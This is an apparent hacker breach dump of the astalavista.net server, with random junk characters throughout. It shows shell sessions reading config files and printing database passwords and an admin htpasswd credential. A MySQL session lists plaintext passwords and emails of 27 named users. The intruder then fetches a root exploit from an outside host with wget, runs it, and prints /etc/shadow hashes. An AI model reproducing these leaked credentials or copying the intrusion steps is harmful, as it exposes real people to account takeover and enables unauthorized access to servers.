drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
9 [2 \6 O# t. ~ O9 [' Edrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
* O; l7 u7 ~% z& ]: R# ]drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com: O Z% a* z+ D1 Y& [
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
0 b. _0 l5 D: |# d+ ^6 Adrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner+ c7 Y8 T0 Y8 c5 i0 [# g
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
$ T4 s6 Y1 l7 R6 p/ [1 D5 s7 ~ Odrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config/ `0 P3 m0 Z& E% s7 ^
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
8 @4 z# r8 F% k! o# R: |8 ^# M @drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
+ w* P2 }8 L9 {' d3 u A; W6 ^3 C-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php* U& k: Y# Y1 Q
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
, ]7 _0 Z* f9 V0 ~drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
1 U3 S/ c$ a: O7 `4 x fdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
* R5 a) w4 `2 z5 S, ]: A% a. i3 @- w-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
5 v1 p/ }6 [: C, L) `-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess2 b! T4 i; X* b, g# m$ D+ j- C1 V h
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
' O% h* {& j K5 R. }-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
. l, g) [, S, T. z-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
3 O0 K* c5 |" X2 j. A4 ?2 z-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php* ?: A" W, b4 p0 i! a. ~" c
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf: C" u3 V; N" I+ f: s
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
6 Q5 L! X( Q |& b1 idrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
& ~" I7 v; F; U8 {( n' jdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
, i" A" d# J Pdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log) [7 p1 a2 a7 k5 V9 E8 o( }7 @
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member [5 W' J, q' U! a+ x$ ?. D' k4 n$ M
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
& E9 f6 y, ?/ Ydrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new" i; B- _/ J! O9 }2 j; H7 V: Z8 ?& W- M7 v
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
( Y. ]8 l3 F* ^: @$ f9 a- wdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re0 U/ J/ ]& c- R' g
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
2 E Z, n% ]) z1 t5 tdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
( G& ]! z$ ]6 h+ W! `( N7 [5 vdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
8 o0 O% f, q/ X/ Z: D& k, M Adrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
9 K# X6 N8 t8 t/ \5 Z8 ~drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
9 H! `" i% p6 ldrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src; `0 {- ?( F2 n. a3 \" A. g! E. b7 c
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
5 q5 y+ U! t4 ]3 o: ldrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
( V! U- f. D; A& D9 [0 y- `5 ~: Ldrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old0 G8 j# r) A0 g
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
# d' y" E' B! O8 sdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki }$ I! o* { [6 w' @
7 ]" r9 ^1 C o2 L D; Y% L Gsh-3.2$ head -20 index.php
- Q- ^. ^1 J& i1 }7 C F5 n2 T# `<?PHP
1 \7 B# W" C7 t- @/**
8 v/ X7 r0 G* r4 n" o* Mainfile (external) for astalavistaNET v2.0
1 a- D Y) t) X- j1 U' K- s8 o*0 a) R0 B2 T' ?5 A" g- v/ J
* @copyright Astalavista IT Engineering GmbH
& _4 V ^3 P: e) C6 Q4 K3 m* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>$ ]* G+ u& I% A9 ?0 Q" }* \
* @version 1.0
( b: ]; |5 V" @/ ]*/6 o1 r5 m4 E6 C7 w: _
, r& I. m0 @3 h8 e if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {. N# a& F# M; o9 W8 I
$dontStartSession = false;: {7 c$ }) y6 d
} else {4 k- J V8 N! I7 a3 v6 |( h
$dontStartSession = true;
0 _+ _2 L; t5 e6 T }
& G+ X8 X+ ^5 ]& g require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
4 q. N4 {/ e3 W7 z+ f# f: v require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);$ x, L( L% z! Q7 s; M9 D
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
! O+ f/ \, m! ~" f require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);6 B1 V, L2 I2 X. S" B& d! C2 F/ j
& z u/ A8 W) I9 \# {! }- ksh-3.2$ cd config
6 R$ C7 u' [2 G' ^! g) _2 z2 ]sh-3.2$ ls -la
2 n6 K/ J& V5 u' g5 ytotal 32. T5 y# O( V) A
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
" ~, U; E5 c# \0 O; c/ L; p3 cdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..* o: m# r2 u# f7 ]8 U
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
2 z6 T+ v9 ~% R$ L/ a$ z-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php: K/ c' |4 K* R4 \0 |" U4 J
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php R! \! r$ H/ v3 f; H5 M
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
$ I U! x& ^! }$ j- w# w-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php+ b+ }- ~7 P6 X$ o
. `! J! z! N* w9 _7 j1 F. a: K7 l* z
sh-3.2$ cat com.conf.php! f* d4 X4 {. S1 r
[snip]9 H( i9 b6 c$ A# @* U# n$ K
//member-database
$ o! ~5 P) @! L3 I% t4 J0 m$_CONFIG['db_mem_server'] = ‘localhost’;
: d' V/ A2 i- A* t3 F: T8 n$ q# x$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
9 }0 s5 ?1 i( `5 V/ b$_CONFIG['db_mem_user'] = ‘astanet_db’;+ K- J. W. ^6 L- o4 V) R2 J
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;# F8 E6 B" S \4 ~4 `/ n
$_CONFIG['db_mem_debug'] = false; //true or false8 P8 U( j3 E6 X. e
//ads-database, }* L/ N1 n0 l6 W; z$ S8 h
$_CONFIG['db_ads_server'] = ‘localhost’;
& S ~6 M6 W L% P# V" }$_CONFIG['db_ads_database'] = ‘astanet_ads’;
4 p# k& F) q4 m- s# X. J$_CONFIG['db_ads_user'] = ‘astanet_db’;" B2 h& G- J: I4 P8 i
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
! G( J9 U9 a7 M$_CONFIG['db_ads_debug'] = false; //true or false$ c) l5 U. x7 h
//rainbow-database
* C* X# @$ c3 s, L2 K/ I- s, R$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;) r7 N( s9 E( ~) M7 t4 \9 @5 U5 |
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
; q/ ]/ a6 q9 a x0 c$_CONFIG['db_rainbow_user'] = ‘dinu’;: V! L" N% A" e1 i1 y4 f8 V- V
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
! V2 [1 X) e9 W' [- B, G0 ]5 c3 N$_CONFIG['db_rainbow_debug'] = false; //true or false
3 Q6 }! g$ ]" R1 E4 _2 v1 V) V//mailing lists database8 A; B* t) g$ B0 j3 t
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
% b* g/ M# H; h# C9 |$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
% j3 E' H+ d; g; X5 t z0 c$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
$ |( U* }$ w. l- l/ b4 ? p$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;4 w) \% y( d' \2 [
$_CONFIG['db_mailing_lists_debug'] = false; //true or false/ ]5 G8 l6 n8 T- _* g; ]
//paypal! b H: I0 P: ?: t
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;/ B# x. ]( r2 P9 H
$_CONFIG['sub_pp_cmd'] = ‘_xclick’; t& K7 t6 L0 x2 ~) ~8 o7 g
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;+ X# ~6 m* F5 F5 W
$_CONFIG['sub_pp_noship'] = ‘1′;% {/ E( C7 I. l/ a1 ~' q
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;, Y5 T" M, F- D
[snip]' n* M! y; w' V& X9 v' f$ e
U- s5 Y7 e* Zsh-3.2$ cd ..
' I/ G/ t1 N7 t$ P9 ^sh-3.2$ cd member
. b3 ]; a6 S$ w5 E+ m4 M4 Fsh-3.2$ ls -la: H& D! l0 D* C- j3 a/ r) `
total 20
+ E( D |/ q' t* r: Hdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
2 {7 b- O, I+ m# t. ^drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..1 Z. C) `; }- V% c5 J
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess" A4 z$ j7 X7 t7 Z+ c( O4 y
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
+ {9 i8 o2 H2 O8 _) ~; ish-3.2$ cat .htaccess
* J1 x6 a7 ~8 J1 d; r7 @SecFilterEngine off7 N0 t% j: F0 }6 [
# R9 n9 l: q7 W, _! Csh-3.2$ cd ..9 X; W& E; a9 I2 H
sh-3.2$ cd cron/ e6 E+ y% S0 H6 U$ s
sh-3.2$ ls -la
: n& [' p! L5 h/ M) y# Ltotal 1683 O: N ]- y) B1 C
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
1 e7 y% o, ]) s' Q. k2 M3 ]drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..3 F" ]( n' `$ m$ \, h+ X0 e8 Q
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
9 L/ X( q; ~4 E9 q/ T( [-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php& h5 k/ t+ U5 o0 [
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
8 n# v ^, S% ~' _6 H6 [5 g; O-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
% _9 B) X& z6 n" b5 L-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
8 E$ ?( A8 _/ k-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
( f6 s0 |; o* u+ S" b7 m0 R% `* B-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
3 g0 I# f j5 Q" ~8 {-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
3 s! r& q" X# ?! @-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
% K7 x0 x4 o7 W- p& L-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
, M" }8 j- {1 a" n% Q9 B-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php% E# m2 m* s! e3 F
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php) O3 Z b5 C5 H' e$ ~' j
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
) a; M" x$ O4 V2 u' X-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php& q N% W: z9 \5 L
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php% y& N4 I9 V0 B7 L, k
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
! ~: ~8 g6 `' O7 O-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
, F: X5 w. h$ w& j-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
; X. P6 H% g: Z/ Udrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email/ T Z7 z7 r4 ~9 @" M( H; b
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php C6 B& R7 j. e. ?4 a- i
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
' \: b# ?0 r1 {1 h' m: l8 h t F# c, H8 h9 L
sh-3.2$ cd ..9 p: ~" N" V+ C* O Y/ W: g W
sh-3.2$ cd _007
3 n6 K* ?8 u( msh-3.2$ ls -la+ s0 r! [! Y; w$ e
total 24
, Q# U2 N: C, v1 n1 ]drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .7 r* X3 P4 H* l+ [4 z, R2 `3 p
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..; P8 I; q* n# m. N
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
! \; I8 s% ^ e- ?! r( g-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php# S& W6 x% F4 x# ? ~4 e/ P
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
- `- `: |( R( I& }. A3 vdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap" W8 z" T# O0 q# s4 w0 i
. I- \/ `( {' M' a# b5 m* K
sh-3.2$ cat .htaccess
3 O( D& w3 t: j! AauthType Basic' l3 c" W, s% X) o
authName Admin$ D- ^6 q+ t3 K6 U( o! R* O
authUserFile /home/astanet/auth/.htadm_pwd8 X3 n, ?7 G; [8 X* i3 S! b8 f
require valid-user
0 W4 d1 \8 a4 m! E. }1 P9 J6 Q( R R, E' @8 c5 k' r& T
sh-3.2$ cat /home/astanet/auth/.htadm_pwd' b# n1 D3 J; E( ~
admin2net:CR0bl65MwhfT5 b/ c' N( E' W
0 z; X( Z1 m: ^/ M
sh-3.2$ mysql -u astanet_db -p2 l9 F( j% O: r/ k2 P
Enter password:5 P+ n* @! D: g' u, ?
Welcome to the MySQL monitor. Commands end with ; or \g.+ h+ v( N3 ^; J- n0 n1 j
Your MySQL connection id is 2751534 v) Y4 x4 }5 n% K
Server version: 5.0.45-community-log MySQL Community Edition (GPL)$ e) t: D9 W. e! z. o) K
4 I+ y1 W, F4 U. ?
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
/ K. @4 W( r& t2 g0 u# J& V0 q7 R( E r0 C3 Q( ], D' R
mysql> show databases;
9 X6 g6 r8 `: w. M+———————–+
2 Z; K* E% h# |' O4 u| Database |$ T6 w% I9 H/ x3 I0 R2 U2 Z( g
+———————–+
; r7 p' F4 T; t5 C| information_schema |! l X- [* P0 S! j( R
| astanet_ads |
- L8 F5 f) \5 K5 W% p| astanet_mailing_lists |. Q7 x0 I/ ?# ]' H4 D# k2 D
| astanet_mediawiki |/ e! ]2 Y/ Q/ o' \' D- S( f. ^
| astanet_membersystem |
u2 f2 D$ L! E# t# g| test |
; y( R6 `3 k* O0 n8 r; h+———————–+# g' H, R; w! R5 h3 ~
6 rows in set (0.00 sec)
9 S) ~& G$ c1 U6 T% M# b, H: Z. ^3 y) @/ H5 k3 ]& F# e
mysql> use astanet_membersystem
7 p" }6 R- _; NDatabase changed3 P: K5 @* |+ N3 M2 e
mysql> show tables;
& z" D# c" s6 j. |& C/ N* P+———————————–+
E* {/ I3 i2 `& m| Tables_in_astanet_membersystem |
9 y" W$ Q4 Z. x" W7 k; k+———————————–+
5 l, e6 k% T9 @- g| blacklist_categories |
5 S" c9 k, B% d0 p' }| blacklist_content |
6 p+ V H2 c8 Y( D! W7 j' [| blacklist_levels |* e2 X3 J2 f, D* y
| blacklist_mcset |
: x c; Q& E: T7 U| dir_categories | h& U$ V0 o* l8 a! c
| dir_comments |
* l8 l6 i6 M* C5 E$ ]1 P4 r5 S| dir_links |, J& n" n. e* o3 y# K
| dir_temp |6 s: V6 j4 C) T6 x
| dir_votes |
, _, ?. v0 G$ |4 p3 Y% S4 u| documents |
5 ^9 n1 P6 J D8 k- s# t) f| documents_categories |! a* S7 `8 @' U& {1 {& i0 a
| email_content |
% P g; k$ B7 S U" \/ W) e| email_settings |; B' K. c6 W' C8 Q
| exploits |
* Z, s: M4 I y$ N- }/ @| exploits_categories |& E& P4 t$ U0 J6 R+ Q2 @$ i: U) s1 w
| exploittree_categories |6 a6 i* q9 V$ t, ~2 V
| exploittree_exploits |" {1 u6 y, R' |; ?2 {" E
| home_values |
1 a' {# O( ~; @8 T/ k# S| iso_countries |
9 a; H/ R X# B# A. F$ b7 X| links_categories |
$ A C8 x) v- \2 f2 N6 D8 o% b| links_records |
4 C7 g; S8 _% f4 t5 C| links_unauth |
/ t3 X3 }& j I% x+ d* o| links_votes |
5 D2 ~2 I1 @9 @) H/ A| log |' v" p9 r8 |+ N" E
| news_categories |6 C* [# @% n U& e3 O
| news_comments |0 y& g$ i% Q) Y
| news_emoticons |
4 b8 q& I% F. q* T2 _| news_latest |
) @; q& z: L N| news_messages |
( r) W/ i6 X8 ?6 H( P4 S| news_statistics |
8 B; G$ }- D2 v. y5 H| news_votes |$ L* A2 f8 x1 x( t# i3 v2 {
| prices_content |4 V2 b1 m: w# `& W% \2 m0 v9 A
| prices_offers |6 b1 F! l) O, T7 Y+ c; {
| rss_settings |
* f" I4 K' A& `| sessions |; H+ r" Z/ ]# E( z
| stats_signups |
$ Y( A/ R0 @, _8 `. @# @$ Q7 _| u2u2 |
, c7 J( E8 y" P( R [9 Y| u2u_contact |
; e; B3 \" ^% S& i S8 || u2u_settings |- E. @9 }, ^* Y" E1 o
| user_keywords_selected_categories |
) `$ v1 t0 D7 n. q% [* p, i9 ^| users |
" `: L1 y% o( f1 V+ C| users_ipn_test |8 g5 ?5 B9 Q- e/ T u
| users_keyword_values |
+ I [- n# t: M6 _+ O| users_profile |) J: \0 x: ?6 L( q0 j* A+ a0 j
| users_temp |& n( H! u/ z7 s8 |+ j+ c7 X& N
| users_upgrade |
- s5 T3 n) D/ p! g$ r+———————————–+
8 N: x V4 d+ `& D+ [. S46 rows in set (0.00 sec)
% s4 i$ F( N) I$ N$ l* I, T: Z' J4 K! N8 T" o$ f2 l
mysql> describe users;
( _- W! E* s4 `6 T6 y- _+ w+————————–+————————————–+——+—–+———————+—————-+1 W7 R ~8 }! U: S% Q# O
| Field | Type | Null | Key | Default | Extra |
# k0 {7 P B9 T# T) Y+————————–+————————————–+——+—–+———————+—————-+
# q% c8 y, B+ a7 B/ z' e3 p8 g| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
5 o" C, H9 _/ }0 w# i4 | j| user | varchar(50) | NO | | | |
. c& Z: c( h9 V% X4 h8 m9 |) m| nickname | varchar(30) | NO | MUL | anonymous | |
- |+ m6 D) E, d/ `1 Q. k+ a- O) O| password | varchar(30) | NO | | | |4 _; C9 B3 ~, q* {
| userlevel | tinyint(3) | YES | MUL | NULL | |
0 n1 A/ B/ @& v8 U! \& || exp | int(8) unsigned | NO | | 0 | |9 ?# E6 _2 R: q
| email | varchar(50) | NO | | | |, J' s* z) Q+ `* t5 W _
| ip | varchar(15) | NO | | 0 | |. d9 ?1 [: o$ E( y+ ~* ]4 x, C, `# ^
| proxy | set(’0′,’1′) | NO | | 0 | |
9 l2 [% r. a7 T/ J| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |9 i! k4 M; C+ f4 i( }, q
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |# t9 m" Y# Q" R! U! Y
| anz_in | tinyint(1) | NO | | -1 | |1 \& B7 D3 s2 j1 m4 V: \+ E7 f o$ c
| status | tinyint(1) unsigned | NO | | 0 | |
2 l# C4 }# D. X) }: e| checked | set(’0′,’1′,’2′) | NO | | 0 | |; P# E, L( T' c+ b Y# a! b6 @
| freemember | set(’0′,’1′) | NO | | 0 | |
4 [; b. X! @! d/ e+ {* d* `; p| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |; T3 y) G- `1 x& ]/ Q
| lang | tinytext | NO | | | |
0 w+ N/ x* Y9 Y; e# @3 o| adid | smallint(6) | NO | | 0 | |0 p$ w7 S4 I/ B! d x5 Z
| pp_txn_id | varchar(255) | YES | | NULL | |( u; m, a* X% I- r/ L8 B
| cnb_transaction_id | varchar(255) | YES | | NULL | |
0 e u) r2 d% [! Q| cnb_order_id | varchar(255) | YES | | NULL | |
( _ v# B: c$ J/ l6 X! _5 |' n| cnb_user_id | int(11) | YES | | 0 | |
* P) e9 |# y% b7 P" `& C( Y( |4 A+————————–+————————————–+——+—–+———————+—————-+/ U, O7 O/ V6 X! E! L
22 rows in set (0.01 sec): a) I4 m( |8 z6 Z- N! E( ]
/ Y7 c2 J, u: }7 ?: h& Rmysql> select count(*) as skids from users;
3 a& j( e1 s" ]+ \4 V7 ?0 Q+——-+
, o# @2 i( d' I" j/ E8 ^| skids |
4 r2 I, l( O' G5 \( ]5 {: G+——-+
1 C4 f2 C4 h/ p0 j) u2 C* A* ?| 25199 |
+ a" {* }- e* o. ]5 ~+——-+# D0 s; f' b$ h4 k+ n
1 row in set (0.00 sec)- g4 t+ y+ Q# z
3 e, J9 I8 C* c4 @' T
mysql> select user,nickname,password,email from users where userlevel = 1;
" i$ y- x0 e6 S1 L4 L" r+————————–+———————-+——————+———————————–+
}# o% e3 B2 ~; F| user | nickname | password | email |
* `& O5 S2 O2 ~3 @; h8 H+————————–+———————-+——————+———————————–+
& n. ^; b& A5 w8 z* i8 `| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
8 n4 o7 Y- `6 Z1 o' l| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
% b* H3 Q/ e$ Y0 t1 i| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
0 m+ _6 v! A; X| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |! D6 f. b/ M% U5 G8 y7 C
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |% A& t ?2 Y) n$ p; Q4 Z2 ]' x
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |' P6 Y0 T. A+ e5 d# R+ ~- K7 t
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
+ ^1 a# M% a; V4 ?- U! S| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |- n3 y. d. S8 D% O7 G
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |1 B. n2 j, X0 W! e& n4 j
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |$ Z: }8 a( U* c7 ~/ [
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
# q, Z# g: P* C4 ^. i5 }4 T$ q3 r" b| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
4 y. m* B- X K! i( ~| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |+ ~6 x+ p. @, G
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |" u+ _$ w7 p! p9 {
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com | u- d% w2 m/ g# I0 t
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |" G. Y) d q% W
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
9 W( I2 N5 J+ Y| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |' G; e% c6 N! V1 Q* @* `
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |, E$ C9 r/ i$ @- T. F
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |( Z8 f: t5 Y$ `5 a# ?
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |0 d' ?# }) k# h" ]
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
- l0 i: I1 ^1 p/ ^5 G4 q, ~| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
( W G+ J: k6 R1 T; X" t| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
3 d* ~' H, F7 C+ K| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |# \1 s- @1 C4 Y1 S
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |0 g* |/ O# g# ?1 F9 _. u# U
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
% l( z/ G' ^& W9 w7 n% X+————————–+———————-+——————+———————————–+7 u: w) z% m' T L+ d) H n7 q
27 rows in set (0.00 sec)
* ]' E! _ q) C: [2 B4 B# q8 _! ~* c1 i: h3 [
mysql> exit;6 K; g2 Z7 V! k* L' ~
Bye
6 Q1 |: w/ _& h) n* E! C" A' O- t* m- W" U
[~] plaintext passwords? yes,: z) a& {" x1 b8 {
Those so called “security professionals” who charge you $6.66 / month to6 U1 `8 _) @0 ^8 w
register at their hack-proof portal, save your passwords in plaintext…# U n; n: u+ H" L" L
brilliant!
h1 x3 u3 M, r! b2 F2 r' W; a* b) b. _+ a0 a
[~] This been fun but we want more.9 x- Z9 `4 T0 m
% u4 G7 C9 C& | ^4 o% p" Ish-3.2$ uname -a
5 f% B7 s( X/ [7 }! p2 _Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux. g; b, `" z. @1 W
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]. A( F' K& e' n8 `# j' C! G/ U
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
! G+ O% Y3 l9 a2 G/ m& W6 Z0 A* n# AResolving anti.sec.labs… 13.33.33.37
( E/ W6 P* l# @8 P% m7 M- iConnecting to anti.sec.labs|13.33.33.37|:80… connected.; ]- ]- H( \6 A! s% L% n' `# p
HTTP request sent, awaiting response… 200 OK
$ s2 c% i, S/ G& L' L8 kLength: 18200 (18K) [text/plain]
6 }/ C( B- b# m( y) j7 vSaving to: `g0troot’/ {, O/ w# i) a3 Q7 m+ B0 R/ ]
, @( }5 @9 i: l# J, q0 X# e9 L100%[=========================================================================================================================================>] 18,200 58.6K/s in
* f3 L7 D( h, l4 @0.3s) X/ b+ H8 f$ H, D) s
: ^3 [, r5 a# x, h18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
1 d8 Q% Z" F4 x6 I0 f4 D- x* Z) a5 m, J( ]$ O1 H& x" Q9 Y
sh-3.2$ ./g0troot -i x86_64$ G$ L3 f2 u3 A% ~$ ?& v- W3 K4 }; c$ I! H
[+] g0troot - anti.sec.labs7 c( \& c+ F% I7 y& b7 z
[+] Target: 2.6.18-128.1.10.el55 r! R- G+ ]2 i. D: _, D5 a
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>] g( v6 _7 {$ d
6 c$ T+ P; v5 d! z7 d. b4 x) ^
[+] r00tr00t; R+ u$ L5 b" w: J% P9 \- T6 H! s7 B
[~] Executing shell…" x' }. l! C3 t
- c4 u: x }: P* K. J6 k
sh-3.2# id, C7 d# v3 h9 @
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
3 t) X( F( A! {: V/ v7 t
0 g, C0 J; {5 [& c6 nsh-3.2# cat /etc/shadow
6 u4 P- u# o" w: Froot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
& @9 ~$ `7 G5 z! i: Y1 e[snip]7 r" r$ N2 x/ x; p
admin 1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::! m3 z0 R) t) F9 i: M/ I4 j4 q
jon 1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::7 T: Q) k$ Q1 S$ y# h6 }' f
com 1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
